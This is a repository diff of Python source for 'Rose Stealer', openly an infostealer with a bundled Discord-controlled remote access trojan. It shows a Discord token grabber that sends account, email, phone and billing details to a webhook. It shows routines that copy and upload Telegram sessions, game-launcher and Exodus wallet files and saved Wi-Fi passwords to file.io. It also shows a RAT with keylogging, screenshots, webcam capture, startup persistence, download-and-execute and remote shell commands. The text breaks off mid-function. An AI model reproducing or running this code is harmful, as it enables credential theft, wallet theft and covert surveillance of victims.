{
"Name": "Early_Verified_Bot_Developer",
"Value": 131072,
"Emoji": "<:developer:874750808472825986> ",
},
{
"Name": "Bug_Hunter_Level_2",
"Value": 16384,
"Emoji": "<:bughunter_2:874750808430874664> ",
},
{
"Name": "Early_Supporter",
"Value": 512,
"Emoji": "<:early_supporter:874750808414113823> ",
},
{
"Name": "House_Balance",
"Value": 256,
"Emoji": "<:balance:874750808267292683> ",
},
{
"Name": "House_Brilliance",
"Value": 128,
"Emoji": "<:brilliance:874750808338608199> ",
},
{
"Name": "House_Bravery",
"Value": 64,
"Emoji": "<:bravery:874750808388952075> ",
},
{
"Name": "Bug_Hunter_Level_1",
"Value": 8,
"Emoji": "<:bughunter_1:874750808426692658> ",
},
{
"Name": "HypeSquad_Events",
"Value": 4,
"Emoji": "<:hypesquad_events:874750808594477056> ",
},
{
"Name": "Partnered_Server_Owner",
"Value": 2,
"Emoji": "<:partner:874750808678354964> ",
},
{
"Name": "Discord_Employee",
"Value": 1,
"Emoji": "<:staff:874750808728666152> ",
},
]
for badge in badgeList:
if flags // badge["Value"] != 0:
OwnedBadges += badge["Emoji"]
flags = flags % badge["Value"]
return OwnedBadges
@staticmethod
def GetTokenInfo(token):
headers = {
"Authorization": token,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0",
}
userjson = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers)).read().decode())
username = userjson["username"]
hashtag = userjson["discriminator"]
email = userjson["email"]
idd = userjson["id"]
pfp = userjson["avatar"]
flags = userjson["public_flags"]
nitro = ""
phone = "-"
if "premium_type" in userjson:
nitrot = userjson["premium_type"]
if nitrot == 1:
nitro = "<:classic:896119171019067423> "
elif nitrot == 2:
nitro = "<a:boost:824036778570416129> <:classic:896119171019067423> "
if "phone" in userjson:
phone = userjson["phone"]
return username, hashtag, email, idd, pfp, flags, nitro, phone
@staticmethod
def checkToken(token):
headers = {
"Authorization": token,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0",
}
try:
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers))
return True
except Exception:
return False
def uploadToken(self, token):
global hook
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0",
}
username, hashtag, email, idd, pfp, flags, nitro, phone = self.GetTokenInfo(token)
if pfp is None:
pfp = "https://raw.githubusercontent.com/DamagingRose/Rose-Grabber/main/components/assets/dogg.png"
else:
pfp = f"https://cdn.discordapp.com/avatars/{idd}/{pfp}"
billing = self.GetBilling(token)
badge = self.GetBadge(flags)
friends = self.GetUHQFriends(token)
if friends == "":
friends = "`None`"
if not billing:
badge, phone, billing = "None", "None", "None"
if nitro == "" and badge == "":
nitro = "`None`"
current_time_iso = datetime.now().isoformat()
data = {
"content": "",
"embeds": [
{
"title": "Rose Report",
"description": "Rose Instance - Token Information",
"color": cc.get_color(),
"fields": [
{
"name": "Token:",
"value": f"||`{token}`||",
"inline": False,
},
{
"name": "Email:",
"value": f"`{email}`",
"inline": False,
},
{
"name": "Phone:",
"value": f"`{phone}`",
"inline": False,
},
{
"name": "Badges:",
"value": f"{nitro}{badge}",
"inline": False,
},
{
"name": "Billing:",
"value": f"{billing}",
"inline": False,
},
{
"name": "Friends:",
"value": f"{friends}",
"inline": False,
},
],
"author": {
"name": f"{username}#{hashtag} ({idd})",
"icon_url": f"{pfp}",
},
"footer": {
"text": cc.get_footer(),
"icon_url": cc.get_avatar(),
},
"thumbnail": {"url": f"{pfp}"},
"timestamp": current_time_iso,
}
],
"avatar_url": cc.wh_avatar,
"username": cc.wh_name,
"attachments": [],
}
urlopen(Request(self.webhook, data=dumps(data).encode(), headers=headers))

228
Rose-Stealerv1/resources/source/old/games.py Normal file
View File

@@ -0,0 +1,228 @@
import os
from bin.webhook import _WebhookX
from datetime import datetime
import shutil
import requests
from dhooks import Embed
from bin.config import Config
import zipfile
class get_games:
def __init__(self):
self.cc = Config()
self.webx = _WebhookX().get_object()
self.embed = Embed(title="Rose Report", description="Rose Instance - Games and Application Grabber", color=self.cc.get_color(), timestamp=datetime.now().isoformat())
self.embed.set_author(name=self.cc.get_name(), icon_url=self.cc.get_avatar())
self.embed.set_footer(text=self.cc.get_footer(), icon_url=self.cc.get_avatar())
self.userProfile = os.getenv("userprofile")
self.roaming = os.getenv("appdata")
self.tdata_path = os.path.join(self.roaming, "Telegram Desktop", "tdata")
self.uplay_launcher_path = os.path.join(self.roaming, "Ubisoft Game Launcher")
self.epic_games_path = os.path.join(self.roaming, "EpicGamesLauncher", "Saved")
self.steam_path = r"C:\Program Files (x86)\Steam\config"
self.exodus_path = os.path.join(self.roaming, "Exodus", "exodus.wallet")
self.minecraftPaths = {
"Intent": os.path.join(self.userProfile, "intentlauncher", "launcherconfig"),
"Lunar": os.path.join(self.userProfile, ".lunarclient", "settings", "game", "accounts.json"),
"TLauncher": os.path.join(self.roaming, ".minecraft", "TlauncherProfiles.json"),
"Feather": os.path.join(self.roaming, ".feather", "accounts.json"),
"Meteor": os.path.join(self.roaming, ".minecraft", "meteor-client", "accounts.nbt"),
"Impact": os.path.join(self.roaming, ".minecraft", "Impact", "alts.json"),
"Novoline": os.path.join(self.roaming, ".minectaft", "Novoline", "alts.novo"),
"CheatBreakers": os.path.join(self.roaming, ".minecraft", "cheatbreaker_accounts.json"),
"Microsoft Store": os.path.join(self.roaming, ".minecraft", "launcher_accounts_microsoft_store.json"),
"Rise": os.path.join(self.roaming, ".minecraft", "Rise", "alts.txt"),
"Rise (Intent)": os.path.join(self.userProfile, "intentlauncher", "Rise", "alts.txt"),
"Paladium": os.path.join(self.roaming, "paladium-group", "accounts.json"),
"PolyMC": os.path.join(self.roaming, "PolyMC", "accounts.json"),
"Badlion": os.path.join(self.roaming, "Badlion Client", "accounts.json"),
}
self.rose_path = os.path.join(self.roaming, "roseontop")
self.telegram_folder = os.path.join(self.rose_path, "Telegram")
self.steam_folder = os.path.join(self.rose_path, "Steam")
self.uplay_folder = os.path.join(self.rose_path, "Uplay")
self.minecraft_folder = os.path.join(self.rose_path, "Minecraft")
self.epic_games_folder = os.path.join(self.rose_path, "Epic Games")
self.exodus_folder = os.path.join(self.rose_path, "Exodus")
self.games_zip = os.path.join(self.rose_path, "Games.zip")
def get_games(self):
# Telegram
if not os.path.exists(self.tdata_path):
self.telegram_check = True
else:
self.telegram_check = False
if os.path.exists(self.telegram_folder):
shutil.rmtree(self.telegram_folder)
if os.path.exists(self.tdata_path):
try:
shutil.copytree(self.tdata_path, self.telegram_folder)
except Exception:
self.telegram_check = True
pass
# Epic Games
if not os.path.exists(self.epic_games_path):
self.epic_games_check = True
else:
self.epic_games_check = False
if os.path.exists(self.epic_games_folder):
shutil.rmtree(self.epic_games_folder)
if os.path.exists(self.epic_games_path):
try:
shutil.copytree(self.epic_games_path, self.epic_games_folder)
except Exception:
self.epic_games_check = True
pass
# Steam
if not os.path.exists(self.steam_path):
self.steam_check = True
else:
self.steam_check = False
if os.path.exists(self.steam_folder):
shutil.rmtree(self.steam_folder)
if os.path.exists(self.steam_path):
try:
shutil.copytree(self.steam_path, self.steam_folder)
except Exception:
self.steam_check = True
pass
# Uplay
if not os.path.exists(self.uplay_launcher_path):
self.uplay_check = True
else:
self.uplay_check = False
if os.path.exists(self.uplay_folder):
shutil.rmtree(self.uplay_folder)
if os.path.exists(self.uplay_launcher_path):
try:
shutil.copytree(self.uplay_launcher_path, self.uplay_folder)
except Exception:
self.uplay_check = True
pass
# Exodus
if not os.path.exists(self.exodus_path):
self.exodus_check = True
else:
self.exodus_check = False
if os.path.exists(self.exodus_folder):
shutil.rmtree(self.exodus_folder)
if os.path.exists(self.exodus_path):
try:
shutil.copytree(self.exodus_path, self.exodus_folder)
except Exception:
self.exodus_check = True
pass
# Minecraft
if os.path.exists(self.minecraft_folder):
shutil.rmtree(self.minecraft_folder)
self.minecraft_check = True
for self.minecraftPath in self.minecraftPaths.values():
if os.path.exists(self.minecraftPath):
self.minecraft_check = False
try:
print(os.path.basename(os.path.dirname(self.minecraftPath)))
print(os.path.join(self.minecraft_folder, os.path.basename(os.path.dirname(self.minecraftPath))))
if not os.path.exists(self.minecraft_folder):
os.mkdir(self.minecraft_folder)
if not os.path.exists(os.path.join(self.minecraft_folder, os.path.basename(os.path.dirname(self.minecraftPath)))):
os.mkdir(os.path.join(self.minecraft_folder, os.path.basename(os.path.dirname(self.minecraftPath))))
shutil.copy(self.minecraftPath, os.path.join(self.minecraft_folder, os.path.basename(os.path.dirname(self.minecraftPath))))
except Exception as e:
pass
# Create ZIP
if not self.epic_games_check or not self.steam_check or not self.uplay_check or not self.telegram_check or not self.minecraft_check or not self.exodus_check:
if not os.path.exists(self.games_zip):
with zipfile.ZipFile(self.games_zip, "w", compression=zipfile.ZIP_DEFLATED) as zf:
if not self.telegram_check:
for root, dirs, files in os.walk(self.telegram_folder):
for file in files:
file_path = os.path.join(root, file)
arcname = os.path.relpath(file_path, self.telegram_folder)
arcname = os.path.join("Telegram", arcname)
zf.write(file_path, arcname)
if not self.epic_games_check:
for root, dirs, files in os.walk(self.epic_games_folder):
for file in files:
file_path = os.path.join(root, file)
arcname = os.path.relpath(file_path, self.epic_games_folder)
arcname = os.path.join("Epic Games", arcname)
zf.write(file_path, arcname)
if not self.steam_check:
for root, dirs, files in os.walk(self.steam_folder):
for file in files:
file_path = os.path.join(root, file)
arcname = os.path.relpath(file_path, self.steam_folder)
arcname = os.path.join("Steam", arcname)
zf.write(file_path, arcname)
if not self.uplay_check:
for root, dirs, files in os.walk(self.uplay_folder):
for file in files:
file_path = os.path.join(root, file)
arcname = os.path.relpath(file_path, self.uplay_folder)
arcname = os.path.join("Uplay", arcname)
zf.write(file_path, arcname)
if not self.exodus_check:
for root, dirs, files in os.walk(self.exodus_folder):
for file in files:
file_path = os.path.join(root, file)
arcname = os.path.relpath(file_path, self.exodus_folder)
arcname = os.path.join("Exodus", arcname)
zf.write(file_path, arcname)
if not self.minecraft_check:
for root, dirs, files in os.walk(self.minecraft_folder):
for file in files:
file_path = os.path.join(root, file)
arcname = os.path.relpath(file_path, self.minecraft_folder)
arcname = os.path.join("Minecraft", arcname)
zf.write(file_path, arcname)
# Upload ZIP
upload_url = "https://file.io"
files = {"file": (self.games_zip, open(self.games_zip, "rb"))}
response = requests.post(upload_url, files=files)
if response.status_code == 200:
self.download_link = response.json().get("link", "Unknown")
else:
self.download_link = "Unknown"
self.embed.add_field(name="Games", value=f"[Download]({self.download_link})", inline=False)
# Send embed with download link
self.webx.send(embed=self.embed)

93
Rose-Stealerv1/resources/source/old/ipinf.py Normal file
View File

@@ -0,0 +1,93 @@
import subprocess
import os
from bin.config import Config
from datetime import datetime
from bin.webhook import _WebhookX
from dhooks import Embed
from urllib.request import Request, urlopen
from urllib.error import URLError
import requests
from bin._random_string import *
cc = Config()
class Info:
def __init__(self):
self.ip = self.get_public_ip()
def run_command(self, command):
result = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout = result.stdout.decode("utf-8", errors="replace")
stderr = result.stderr.decode("utf-8", errors="replace")
return stdout, stderr
def get_wifi_profiles(self):
output, _ = self.run_command("netsh wlan show profiles")
profile_names = [profile.strip() for profile in output.split(":")]
return profile_names
def get_wifi_profile_output(self, profile_name):
command = f'netsh wlan show profile name="{profile_name}" key=clear'
output, _ = self.run_command(command)
return output
def get_public_ip(self):
try:
response = urlopen(Request("https://api.ipify.org"), timeout=10)
return response.read().decode().strip()
except URLError:
return "Unknown"
def main(self):
wifi_profiles = self.get_wifi_profiles()
rndm_strr = get_random_string(25)
self.path = os.path.join(os.getenv("APPDATA"), "roseontop", f"wifi_profiles_{rndm_strr}.txt")
with open(self.path, "w", encoding="utf-8") as file:
for profile_name in wifi_profiles:
profile_output = self.get_wifi_profile_output(profile_name)
file.write(profile_output + "\n")
file.write("-" * 50 + "\n")
upload_url = "https://file.io"
files = {"file": (os.path.basename(self.path), open(self.path, "rb"))}
response = requests.post(upload_url, files=files)
if response.status_code == 200:
self.wif_dwnld_l = response.json().get("link", "Unknown")
else:
self.wif_dwnld_l = "Unknown"
def send_data(self):
webx = _WebhookX().get_object()
self.main()
try:
response = requests.get(f"https://ipinfo.io/{self.ip}/json")
if response.status_code == 200:
self.ipdata = response.json()
except Exception:
return {}
embed = Embed(title="Rose Report", description="Rose Instance - IP and WIFI Information", color=cc.get_color(), timestamp=datetime.now().isoformat())
embed.set_author(name=cc.get_name(), icon_url=cc.get_avatar())
embed.set_footer(text=cc.get_footer(), icon_url=cc.get_avatar())
embed.add_field(name="IP", value=f"`{self.get_public_ip()}`", inline=False)
embed.add_field(name="Country", value=f'`{self.ipdata.get("country", "Unknown")}`', inline=False)
embed.add_field(name="City", value=f'`{self.ipdata.get("city", "Unknown")}`', inline=False)
embed.add_field(name="Postal", value=f'`{self.ipdata.get("postal", "Unknown")}`', inline=False)
embed.add_field(name="Latitude", value=f'`{self.ipdata.get("loc", "Unknown").split(",")[0]}`', inline=False)
embed.add_field(name="Longtitude", value=f'`{self.ipdata.get("loc", "Unknown").split(",")[1]}`', inline=False)
embed.add_field(name="State", value=f'`{self.ipdata.get("region", "Unknown")}`', inline=False)
embed.add_field(name="WIFI", value=f"[Download]({self.wif_dwnld_l})", inline=False)
webx.send(embed=embed)
os.remove(self.path)
@staticmethod
def get_username():
return os.getlogin()

500
Rose-Stealerv1/resources/source/old/knight_rat.py Normal file
View File

@@ -0,0 +1,500 @@
import discord
import sys
import os
import random
import socket
import webbrowser
import ctypes
import subprocess
import pygame
import requests
import win32con
import keyboard
import time
import shutil
from bin.config import Config
from sys import argv
from PIL import ImageGrab
from discord.ext import commands
cc = Config()
### CONFIG
btoken = cc.get_knight_discord_rat_bot_token() ### NOT OPTIONAL | DISCORD BOT TOKEN NEEDS TO BE PUT HERE FOR THE RAT TO WORK
prefix = cc.get_knight_discord_rat_prefix() ### OPTIONAL | IGNORE THIS IF YOU WANT TO RUN COMMANDS WITHOUT A PREFIX | PREFIX THE DISCORD BOT WILL BE CALLED WITH
userid = cc.get_knight_discord_rat_listener_user_id() ### OPTIONAL | IGNORE THIS IF YOU DON'T WANT TO BE PINGED | ONLY WORKS WITH CHANNELID SET | THIS IS THE USER WHO WILL BE NOTIFIED ABOUT NEW CLIENTS WITH A PING
channelid = cc.get_knight_discord_rat_channel_id() ### OPTIONAL | ONLY SET IF YOU WANT TO GET A MESSAGE WHEN NEW CLIENTS GET ONLINE
### DEV CONFIG
dscrd = 'https://discord.gg/rHdqqqYVzY'
roaming = os.getenv("appdata")
startup_loc = os.path.join(roaming, "Microsoft", "Windows", "Start Menu", "Programs", "Startup")
changed = win32con.SPIF_UPDATEINIFILE | win32con.SPIF_SENDCHANGE
hostname = socket.gethostname()
cwd = os.getcwd()
intents = discord.Intents.all()
bot = commands.Bot(description=f"Running Knight Remote Adminstration Tool.", command_prefix=prefix, intents=intents)
clientid = ''.join(random.choice('0123456789') for i in range(6))
def get_random_string(length):
letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
global result_str
result_str = ''.join(random.choice(letters) for i in range(length))
if channelid == '':
pass
else:
@bot.event
async def on_ready():
usrmention = f'<@{userid}>'
channel = bot.get_channel(int(channelid))
if userid == '':
await channel.send(f"New client online: process {clientid}")
else:
await channel.send(f"{usrmention} | New client online: process {clientid}")
@bot.command(name='open')
async def open(ctx, inputid, fpath):
if inputid == clientid:
try:
os.system(fpath)
await ctx.send(f'Successfully ran file with the path `{fpath}` for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t run file with the path `{fpath}` for process {clientid} because of `{Exception}`.')
if inputid != clientid:
if inputid == 'all':
try:
os.system(fpath)
await ctx.send(f'Successfully ran file with the path `{fpath}` for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t run file with the path `{fpath}` for process {clientid} because of `{Exception}`.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='taskschd')
async def taskschd(ctx, inputid):
if inputid == clientid:
try:
os.system('taskschd.msc')
await ctx.send(f'Successfully started windows task scheduler for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t start windows task scheduler for process {clientid} because of `{Exception}`.')
if inputid != clientid:
if inputid == 'all':
try:
os.system('taskschd.msc')
await ctx.send(f'Successfully started windows task scheduler for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t start windows task scheduler for process {clientid} because of `{Exception}`.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='keylogger')
async def keylogger(ctx, inputid, duration):
if inputid == clientid:
get_random_string(15)
record_time = duration ### DURATION OF KEYLOGGER IN SECONDS
fname = f'keylogger_finaldata_CLIENTID_{clientid}_{result_str}{duration}.txt'
end_time = time.monotonic() + int(record_time)
recorded = []
try:
await ctx.send(f'Started keylogger for process {clientid} with a duration of `{duration}` seconds without any problems. You will be notified in `{duration}` seconds, when the final data is being posted.')
while True:
if time.monotonic() >= end_time:
break
recorded.append(keyboard.read_event())
except KeyboardInterrupt:
await ctx.send(f'Keylogger was killed by secret keystroke for process {clientid} because of `{Exception}`. Exe has been compiled without `--noconsole` probably.')
pass
except Exception:
await ctx.send(f'Couldn\'t start keylogger for process {clientid} because of `{Exception}`.')
with open(fname, 'w') as f:
for keystroke in recorded:
if keystroke.event_type == 'down':
if str('up') in str(keystroke):
str(keystroke).upper()
if str('down') in str(keystroke):
str(keystroke).lower()
f.write(str(f'''{keystroke}
'''.replace('KeyboardEvent', '').replace('(', '').replace(')', '').replace(' up', '').replace(' down', '')))
await ctx.send(file=discord.File(fname))
await ctx.send(f'Keylogger data file `{fname}` from process {clientid} was sent.')
os.remove(fname)
if inputid != clientid:
if inputid == 'all':
get_random_string(15)
record_time = duration ### DURATION OF KEYLOGGER IN SECONDS
fname = f'keylogger_finaldata_CLIENTID_{clientid}_{result_str}{duration}.txt'
end_time = time.monotonic() + int(record_time)
recorded = []
try:
await ctx.send(f'Started keylogger for process {clientid} with a duration of `{duration}` seconds without any problems. You will be notified in `{duration}` seconds, when the final data is being posted.')
while True:
if time.monotonic() >= end_time:
break
recorded.append(keyboard.read_event())
except KeyboardInterrupt:
await ctx.send(f'Keylogger was killed by secret keystroke for process {clientid} because of `{Exception}`. Exe has been compiled without `--noconsole` probably.')
pass
except Exception:
await ctx.send(f'Couldn\'t start keylogger for process {clientid} because of `{Exception}`.')
with open(fname, 'w') as f:
for keystroke in recorded:
if keystroke.event_type == 'down':
if str('up') in str(keystroke):
str(keystroke).upper()
if str('down') in str(keystroke):
str(keystroke).lower()
f.write(str(f'''{keystroke}
'''.replace('KeyboardEvent', '').replace('(', '').replace(')', '').replace(' up', '').replace(' down', '')))
await ctx.send(file=discord.File(fname))
await ctx.send(f'Keylogger data file `{fname}` from process {clientid} was sent.')
os.remove(fname)
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='msgbox')
async def msgbox(ctx, inputid, title, msg):
if inputid == clientid:
emojis = ['', '']
prmtn = await ctx.send(f'Final message box is ready to be sent to process {clientid}. Are we allowed to promote Knight Remote Adminstration Tool a little with it?')
for emoji in emojis:
await prmtn.add_reaction(emoji)
@bot.event
async def on_reaction_add(reaction, user):
MB_OK = 0x0 ### BUTTON
ICON_EXCLAIM = 0x30 ### ICON
emoji = reaction.emoji
if user.bot:
return
if emoji == '':
try:
ctypes.windll.user32.MessageBoxW(0, str(f'Join the Discord server: {dscrd} | Individual user message: ' + msg), str('Your PC is infected by Knight Remote Adminstration Tool! | Individual user title: ' + title), MB_OK | ICON_EXCLAIM) ### FINAL MSGBOX WITH PROMOTION
await ctx.send(f'Successfully showed message box with promotion for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t show message box for process {clientid} because of `{Exception}`.')
return
elif emoji == '':
try:
ctypes.windll.user32.MessageBoxW(0, str(msg), str(title), MB_OK | ICON_EXCLAIM) ### FINAL MSGBOX WITHOUT PROMOTION
await ctx.send(f'Successfully showed message box without promotion for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t show message box for process {clientid} because of `{Exception}`.')
return
else:
return
if inputid != clientid:
if inputid == 'all':
emojis = ['', '']
prmtn = await ctx.send(f'Final message box is ready to be sent to process {clientid}. Are we allowed to promote Knight Remote Adminstration Tool a little with it?')
for emoji in emojis:
await prmtn.add_reaction(emoji)
@bot.event
async def on_reaction_add(reaction, user):
MB_OK = 0x0 ### BUTTON
ICON_EXCLAIM = 0x30 ### ICON
emoji = reaction.emoji
if user.bot:
return
if emoji == '':
try:
ctypes.windll.user32.MessageBoxW(0, str(f'Join the Discord server: {dscrd} | Individual user message: ' + msg), str('Your PC is infected by Knight Remote Adminstration Tool! | Individual user title: ' + title), MB_OK | ICON_EXCLAIM) ### FINAL MSGBOX WITH PROMOTION
await ctx.send(f'Successfully showed message box with promotion for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t show message box for process {clientid} because of `{Exception}`.')
return
elif emoji == '':
try:
ctypes.windll.user32.MessageBoxW(0, str(msg), str(title), MB_OK | ICON_EXCLAIM) ### FINAL MSGBOX WITHOUT PROMOTION
await ctx.send(f'Successfully showed message box without promotion for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t show message box for process {clientid} because of `{Exception}`.')
return
else:
return
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='screenshot')
async def screenshot(ctx, inputid):
if inputid == clientid:
image = ImageGrab.grab(
bbox=None,
include_layered_windows=False,
all_screens=True,
xdisplay=None
)
fname = f'screenshot_{clientid}.png'
image.save(fname)
await ctx.send(file=discord.File(fname))
await ctx.send(f'Screenshot `{fname}` from process {clientid} was sent.')
os.remove(fname)
if inputid != clientid:
if inputid == 'all':
image = ImageGrab.grab(
bbox=None,
include_layered_windows=False,
all_screens=True,
xdisplay=None
)
fname = f'screenshot_{clientid}.png'
image.save(fname)
await ctx.send(file=discord.File(fname))
await ctx.send(f'Screenshot `{fname}` from process {clientid} was sent.')
os.remove(fname)
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='startup')
async def startup(ctx, inputid):
if inputid == clientid:
try:
shutil.copy(argv[0], startup_loc)
await ctx.send(f'Successfully copied file `{argv[0]}` from process {clientid} to `{startup_loc}`.')
except Exception:
await ctx.send(f'Failed to copy file `{argv[0]}` from process {clientid} to `{startup_loc}`.')
if inputid != clientid:
if inputid == 'all':
try:
shutil.copy(argv[0], startup_loc)
await ctx.send(f'Successfully copied file `{argv[0]}` from process {clientid} to `{startup_loc}`.')
except Exception:
await ctx.send(f'Failed to copy file `{argv[0]}` from process {clientid} to `{startup_loc}`.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='upload')
async def upload(ctx, inputid, dwnldlink, filetype): ### PUT FILE TYPES LIKE .png, .exe, .msi, .txt AND MORE THERE WHEN USING THE COMMAND
if inputid == clientid:
get_random_string(15)
r = requests.get(dwnldlink, allow_redirects=False)
fname = f'filedwnldfrweb_CLIENTID_{clientid}_{result_str}{filetype}'
open(fname, 'wb').write(r.content)
emojis = ['', '']
msg = await ctx.send(f'Uploaded file `{dwnldlink}` with the filetype `{filetype}` to process {clientid}. Should the file be executed directly?')
for emoji in emojis:
await msg.add_reaction(emoji)
@bot.event
async def on_reaction_add(reaction, user):
emoji = reaction.emoji
if user.bot:
return
if emoji == '':
try:
os.system('call '+fname)
await ctx.send(f'Successfully executed scraped file `{dwnldlink}` with the filetype `{filetype}` for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t execute scraped file `{dwnldlink}` with the filetype `{filetype}` for process {clientid} because of `{Exception}`.')
return
elif emoji == '':
await ctx.send(f'Okay, scraped file `{dwnldlink}` with the filetype `{filetype}` is not going to be executed for process {clientid}.')
return
else:
return
if inputid != clientid:
if inputid == 'all':
get_random_string(15)
r = requests.get(dwnldlink, allow_redirects=False)
fname = f'filedwnldfrweb_CLIENTID_{clientid}_{result_str}{filetype}'
open(fname, 'wb').write(r.content)
emojis = ['', '']
msg = await ctx.send(f'Downloaded file `{dwnldlink}` with the filetype `{filetype}` to process {clientid}. Should the file be executed directly?')
for emoji in emojis:
await msg.add_reaction(emoji)
@bot.event
async def on_reaction_add(reaction, user):
emoji = reaction.emoji
if user.bot:
return
if emoji == '':
try:
os.system(fname)
await ctx.send(f'Successfully executed scraped file `{dwnldlink}` with the filetype `{filetype}` for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t execute scraped file `{dwnldlink}` with the filetype `{filetype}` for process {clientid} because of `{Exception}`.')
return
elif emoji == '':
await ctx.send(f'Okay, scraped file `{dwnldlink}` with the filetype `{filetype}` is not going to be executed for process {clientid}.')
return
else:
return
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='wallpaper')
async def wallpaper(ctx, inputid, rawimg):
if inputid == clientid:
r = requests.get(rawimg, allow_redirects=False)
fname = f'newwallpaper_{clientid}.jpg' ### ONLY .jpg IMAGES
open(fname, 'wb').write(r.content)
path = os.path.abspath(fname)
ctypes.windll.user32.SystemParametersInfoW(win32con.SPI_SETDESKWALLPAPER, 0, path, changed)
await ctx.send(f'Changed background wallpaper for {clientid} to `{rawimg}`.')
os.remove(fname)
if inputid != clientid:
if inputid == 'all':
r = requests.get(rawimg, allow_redirects=False)
fname = f'newwallpaper_{clientid}.jpg' ### ONLY .jpg IMAGES
open(fname, 'wb').write(r.content)
path = os.path.abspath(fname)
ctypes.windll.user32.SystemParametersInfoW(win32con.SPI_SETDESKWALLPAPER, 0, path, changed)
await ctx.send(f'Changed background wallpaper for {clientid} to `{rawimg}`.')
os.remove(fname)
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='webcam')
async def webcam(ctx, inputid):
pygame.camera.init()
if inputid == clientid:
camlist = pygame.camera.list_cameras()
fname = str(f'webcampicture_{clientid}.png')
if camlist:
cam = pygame.camera.Camera(camlist[0], (640, 480))
cam.start()
image = cam.get_image()
pygame.image.save(image, fname)
await ctx.send(file=discord.File(fname))
await ctx.send(f'Webcam picture `{fname}` from process {clientid} was sent.')
os.remove(fname)
else:
await ctx.send(f'No camera was found for process {clientid}.')
if inputid != clientid:
if inputid == 'all':
camlist = pygame.camera.list_cameras()
fname = str(f'webcampicture_{clientid}.png')
if camlist:
cam = pygame.camera.Camera(camlist[0], (640, 480))
cam.start()
image = cam.get_image()
pygame.image.save(image, fname)
await ctx.send(file=discord.File(fname))
await ctx.send(f'Webcam picture `{fname}` from process {clientid} was sent.')
os.remove(fname)
else:
await ctx.send(f'No camera was found for process {clientid}.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='tasklist')
async def tasklist(ctx, inputid):
if inputid == clientid:
tasks = str(subprocess.check_output('tasklist', shell=True))
fname = f'runningtasks_{clientid}.txt'
with open(fname, 'w') as f:
f.write(tasks)
await ctx.send(file=discord.File(fname))
await ctx.send(f'Wrote all current tasks from process {clientid} to `{fname}`.')
os.remove(fname)
if inputid != clientid:
if inputid == 'all':
tasks = str(subprocess.check_output('tasklist', shell=True))
fname = f'runningtasks_{clientid}.txt'
with open(fname, 'w') as f:
f.write(tasks)
await ctx.send(file=discord.File(fname))
await ctx.send(f'Wrote all current tasks from process {clientid} to `{fname}`.')
os.remove(fname)
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='killprocess')
async def killprocess(ctx, inputid, procname):
if inputid == clientid:
subprocess.run(f'taskkill /f /im {procname}', shell=True)
await ctx.send(f'Initiated to kill process `{procname}` for client {clientid}.')
if inputid != clientid:
if inputid == 'all':
subprocess.run(f'taskkill /f /im {procname}', shell=True)
await ctx.send(f'Initiated to kill process `{procname}` for client {clientid}.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='excshell')
async def shell(ctx, inputid, cmd):
if inputid == clientid:
subprocess.run(f'start cmd /f /c {cmd}', shell=True)
await ctx.send(f'Executed cmd command `{cmd}` for process {clientid}.')
if inputid != clientid:
if inputid == 'all':
subprocess.run(f'start cmd /f /c {cmd}', shell=True)
await ctx.send(f'Executed cmd command `{cmd}` for process {clientid}.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='excpowershell')
async def powershell(ctx, inputid, shllcmd):
if inputid == clientid:
subprocess.run(f'start powershell /c {shllcmd}', shell=True)
await ctx.send(f'Executed shell command `{shllcmd}` for process {clientid}.')
if inputid != clientid:
if inputid == 'all':
subprocess.run(f'start powershell /c {shllcmd}', shell=True)
await ctx.send(f'Executed shell command `{shllcmd}` for process {clientid}.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='isadmin')
async def isadmin(ctx, inputid):
if inputid == clientid:
isadmin = ctypes.windll.shell32.IsUserAnAdmin()
if isadmin:
await ctx.send(f'Process {clientid} **is** admin.')
if not isadmin:
await ctx.send(f'Process {clientid} **is not** admin.')
if inputid != clientid:
if inputid == 'all':
isadmin = ctypes.windll.shell32.IsUserAnAdmin()
if isadmin:
await ctx.send(f'Process {clientid} **is** admin.')
if not isadmin:
